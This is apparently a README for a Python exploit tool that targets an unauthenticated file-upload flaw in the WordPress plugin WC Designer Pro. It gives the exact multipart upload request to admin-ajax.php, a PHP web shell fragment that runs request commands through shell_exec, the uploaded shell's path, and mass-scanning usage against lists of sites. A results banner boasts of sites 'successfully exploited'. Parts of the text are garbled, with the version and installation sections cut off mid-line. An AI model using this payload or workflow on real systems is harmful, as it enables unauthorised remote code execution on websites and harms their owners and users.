Share
## https://sploitus.com/exploit?id=93509C82-B3B5-511B-88DD-5E37F231D631
# ๐Ÿ”“ WC Designer Pro - RCE Exploit

### Unauthenticated Remote Code Execution via Arbitrary File Upload

![Python](https://img.shields.io/badge/Python-3.8+-blue?style=for-the-badge&logo=python&logoColor=white)
![WordPress](https://img.shields.io/badge/WordPress-Plugin-21759B?style=for-the-badge&logo=wordpress&logoColor=white)
![Status](https://img.shields.io/badge/Status-Working-brightgreen?style=for-the-badge)




---



---

## ๐Ÿ“‹ Table of Contents

- [About the Vulnerability](#-about-the-vulnerability)
- [Affected Versions](#-affected-versions)
- [How It Works](#-how-it-works)
- [Installation](#-installation)
- [Usage](#-usage)
- [Technical Details](#-technical-details)
- [Credits](#-credits)

---

## ๐ŸŽฏ About the Vulnerability

The **WC Designer Pro** plugin for WordPress contains a critical **Arbitrary File Upload** vulnerability that allows an **unauthenticated** attacker to upload malicious PHP files, resulting in **Remote Code Execution (RCE)**.

### Summary

| Field | Value |
|-------|-------|
| **Plugin** | WC Designer Pro |
| **Type** | Unauthenticated Arbitrary File Upload |
| **Impact** | Remote Code Execution (RCE) |
| **CVSS Score** | 9.8 (Critical) |
| **Authentication** | Not required |
| **Complexity** | Low |

---

## ๐Ÿ”ด Affected Versions

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  WC Designer Pro =2.28.0
urllib3>=1.26.0
rich>=13.0.0
```

---

## ๐Ÿš€ Usage

### Basic Mode

```bash
python3 exploit.py
```

### Target File (list.txt)

```
https://site1.com
https://site2.com
http://site3.com
site4.com
```

### Shell Example (shell.php)

```php
" . shell_exec($_REQUEST['cmd']) . "";
}
?>
```

---

### Saved Results

```
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘  โœ… EXPLOIT COMPLETED!                                       โ•‘
โ•‘                                                              โ•‘
โ•‘ ๐Ÿ“Š Total Targets: 150                                        โ•‘
โ•‘ ๐ŸŽฏ Successfully Exploited: 23                                โ•‘
โ•‘ โŒ Failed: 127                                               โ•‘
โ•‘ ๐Ÿ’พ Results saved to: success_results.txt                     โ•‘
โ•‘ ๐Ÿš Shells list: uploaded_shells.txt                          โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
```

---

## ๐Ÿ”ฌ Technical Details

### Vulnerable Endpoint

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="action"

wcdp_save_canvas_design_ajax
------WebKitFormBoundary
Content-Disposition: form-data; name="params"

{"mode":"save","editor":"frontend","uniq":"darkarch","files":[{"name":"darkarch","ext":"php","count":"file1"}]}
------WebKitFormBoundary
Content-Disposition: form-data; name="file1"; filename="shell.php"
Content-Type: application/x-php


------WebKitFormBoundary--
```

### Vulnerable Response

```json
{
  "userID": false,
  "filesCMYK": [],
  "success": true
}
```

### Shell Path

```
/wp-content/uploads/wcdp-uploads/temp/{uniq}/{filename}.php
```

### Detection Methods

| Method | Endpoint/Path | Indicator |
|--------|---------------|-----------|
| **AJAX Check** | `/wp-admin/admin-ajax.php` | `{"userID":false,"filesCMYK":[],"success":0}` |
| **CSS Check** | `/wp-content/plugins/wc-designer-pro/assets/css/wcdp-design.min.css` | HTTP 200 |

---
## ๐Ÿ“Š Scan Statistics

```
Tested Targets:       โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ 100%
Vulnerable:           โ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘  15%
Not Vulnerable:       โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘โ–‘  80%
Errors:               โ–ˆโ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘   5%
```

---

---

## ๐Ÿ“š References

- [WordPress Plugin Security](https://developer.wordpress.org/plugins/security/)
- [OWASP File Upload](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload)
- [CWE-434: Unrestricted Upload](https://cwe.mitre.org/data/definitions/434.html)

---

## ๐Ÿ‘ค Credits


  
    
      M2hcs
      Security Researcher
      @m2hcz
    
  


---

## ๐Ÿ“ Changelog

### v1.0.0 (2025)
- โœ… Initial release
- โœ… Multi-threading support
- โœ… Detection via AJAX and CSS
- โœ… Rich interface with progress bar
- โœ… Automatic results saving

---

## โญ Star History

If this project was helpful to you, please consider giving it a โญ!

---



**Made with โค๏ธ for the Security Community**

![Visitors](https://visitor-badge.laobi.icu/badge?page_id=m2hcz.wcdp-exploit)


```

---